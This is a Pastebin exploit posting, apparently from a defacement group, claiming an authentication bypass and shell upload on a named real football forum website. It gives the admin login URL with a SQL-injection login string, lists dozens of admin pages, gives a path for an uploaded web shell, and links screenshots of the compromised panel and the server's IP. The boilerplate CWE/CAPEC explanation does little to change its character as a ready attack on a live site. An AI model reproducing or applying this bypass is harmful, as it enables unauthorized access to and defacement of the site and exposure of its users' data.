KingSkrupellos

Saudi Indian Football Forum Siffjeddah Authentication Bypass

May 10th, 2020
162
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.55 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : Saudi Indian Football Forum Siffjeddah Authentication Bypass Shell Upload
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 10 May 2020
  7. # Vendor Homepage : siffjeddah.com
  8. # Tested On : Windows and Linux
  9. # Category : WebApps
  10. # Exploit Risk : Medium
  11. # Vulnerability Type : CWE-287 [ Improper Authentication ]
  12. CAPEC-115: Authentication Bypass
  13. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  14. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  15. # Exploit4Arab : exploit4arab.org/author/KingSkrupellos
  16. # Zone-H : zone-h.org/archive/notifier=KingSkrupellos
  17. zone-h.org/archive/notifier=CyBeRiZM
  18. # Mirror-H : mirror-h.org/search/hacker/948/
  19. mirror-h.org/search/hacker/94/
  20. mirror-h.org/search/hacker/1826/
  21. # Defacer.ID : defacer.id/archive/attacker/KingSkrupellos
  22. defacer.id/archive/team/Cyberizm-Org
  23. # Inj3ctor : 1nj3ctor.com/attacker/43/ ~ 1nj3ctor.com/attacker/59/
  24. # Aljyyosh : aljyyosh.org/hacker.php?id=KingSkrupellos
  25. aljyyosh.org/hacker.php?id=Cyberizm.Org
  26. aljyyosh.org/hacker.php?id=Cyberizm
  27. # Zone-D : zone-d.org/attacker/id/69
  28. # Pastebin : pastebin.com/u/KingSkrupellos
  29. # Cyberizm.Org : cyberizm.org/forum-exploits-vulnerabilities
  30.  
  31. ####################################################################
  32.  
  33. # Impact :
  34. ***********
  35. CWE-287 [ Improper Authentication ]
  36.  
  37. Authentication is any process by which a system verifies the identity of a user who wishes
  38. to access it.When an actor claims to have a given identity, the software does not
  39. prove or insufficiently proves that the claim is correct. Improper authentication
  40. occurs when an application improperly verifies the identity of a user.
  41. A software incorrectly validates user's login information and as a result, an attacker can
  42. gain certain privileges within the application or disclose sensitive information that allows
  43. them to access sensitive data and provoke arbitrary code execution.
  44. The weakness is introduced during Architecture and Design, Implementation stages.
  45.  
  46. CAPEC-115 [ Authentication Bypass ]
  47.  
  48. An attacker gains access to application, service, or device with the privileges
  49. of an authorized or privileged user by evading or circumventing an authentication mechanism.
  50. The attacker is therefore able to access protected data without authentication ever having taken place.
  51. This refers to an attacker gaining access equivalent to an authenticated user without ever going
  52. through an authentication procedure. This is usually the result of the attacker using an unexpected
  53. access procedure that does not go through the proper checkpoints where authentication should occur.
  54. For example, a web site might assume that all users will click through a given link in order to get to
  55. secure material and simply authenticate everyone that clicks the link. However, an attacker might be
  56. able to reach secured web content by explicitly entering the path to the content rather than clicking
  57. through the authentication link, thereby avoiding the check entirely. This attack pattern differs from
  58. other authentication attacks in that attacks of this pattern avoid authentication entirely, rather than
  59. faking authentication by exploiting flaws or by stealing credentials from legitimate users.
  60.  
  61. ####################################################################
  62.  
  63. # Authentication Bypass / Improper Authentication / Admin Panel Login Bypass Exploit :
  64. ******************************************************************************
  65. /admin/index.php
  66.  
  67. Administrator Username : '=''or'
  68. Administrator Password : '=''or'
  69.  
  70. /club_home.php
  71. /edit_profile.php
  72. /player_home.php
  73. /change_password.php
  74. /player_replace_home.php
  75. /c_form.php
  76. /admin/add_banner.php
  77. /admin/add_club.php
  78. /admin/add_events.php
  79. /admin/add_news.php
  80. /admin/add_piccat.php
  81. /admin/add_picture.php
  82. /admin/add_player.php
  83. /admin/add_report.php
  84. /admin/add_results.php
  85. /admin/add_schedules.php
  86. /admin/add_video.php
  87. /admin/add_videocat.php
  88. /admin/approved_clubs.php
  89. /admin/approved_players.php
  90. /admin/banner_images.php
  91. /admin/c_form.php
  92. /admin/c_form_old.php
  93. /admin/change_password.php
  94. /admin/club_requests.php
  95. /admin/delete_pictures.php
  96. /admin/detail_club.php
  97. /admin/detail_playershold.php
  98. /admin/detailapprove_club.php
  99. /admin/detailapprove_player.php
  100. /admin/detaillive_match.php
  101. /admin/download.php
  102. /admin/edit_club.php
  103. /admin/edit_final.php
  104. /admin/edit_news.php
  105. /admin/edit_piccat.php
  106. /admin/edit_picture.php
  107. /admin/edit_player.php
  108. /admin/edit_quarterfinal.php
  109. /admin/edit_results.php
  110. /admin/edit_schedules.php
  111. /admin/edit_semifinal.php
  112. /admin/edit_videocat.php
  113. /admin/events_home.php
  114. /admin/final_result.php
  115. /admin/header.php
  116. /admin/home.php
  117. /admin/latest_news.php
  118. /admin/live_match.php
  119. /admin/logout.php
  120. /admin/match_report.php
  121. /admin/news_home.php
  122. /admin/pictures_home.php
  123. /admin/player_home.php
  124. /admin/players_hold.php
  125. /admin/print_appplayerlist.php
  126. /admin/print_livematch.php
  127. /admin/print_player.php
  128. /admin/print_playerlist.php
  129. /admin/quarterfinal_result.php
  130. /admin/replace_data.php
  131. /admin/replace_request.php
  132. /admin/results.php
  133. /admin/results_home.php
  134. /admin/rules.php
  135. /admin/savedlive_match.php
  136. /admin/schedules.php
  137. /admin/schedules_home.php
  138. /admin/semifinal_result.php
  139. /admin/standings.php
  140. /admin/status_addplayer.php
  141. /admin/status_replaceplayer.php
  142. /admin/thanku_register.php
  143. /admin/thump.php
  144. /admin/update_apoints.php
  145. /admin/update_bpoints.php
  146. /admin/update_interpoints.php
  147. /admin/update_under18points.php
  148. /admin/upload_fixture.php
  149. /admin/video_home.php
  150. /admin/view_final.php
  151. /admin/view_piccat.php
  152. /admin/view_player.php
  153. /admin/view_quarterfinal.php
  154. /admin/view_replacedata.php
  155. /admin/view_replaceplayer.php
  156. /admin/view_semifinal.php
  157. /admin/view_video.php
  158. /admin/view_videocat.php
  159. /admin/add_events.php?eventid=[ID-NUMBER]&mode=edit
  160. /upload/match_report/[SHELL].php
  161.  
  162. ScreenShot Administrator Control Panel with Shell Uploaded =>
  163.  
  164. https://www.upload.ee/image/11668671/siffjeddahadminpanel10052020.png
  165.  
  166. https://www.upload.ee/image/11668675/saudiindianfootballforum2adminpanel10052020.png
  167.  
  168. https://www.upload.ee/image/11668754/saudiindianfootbalforum3adminpanel10052020.png
  169.  
  170. Reverse IP results for (199.116.117.210)
  171. There are 27 domains hosted on this server.
  172.  
  173. ####################################################################
  174.  
  175. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  176.  
  177. ####################################################################
Add Comment
Please, Sign In to add comment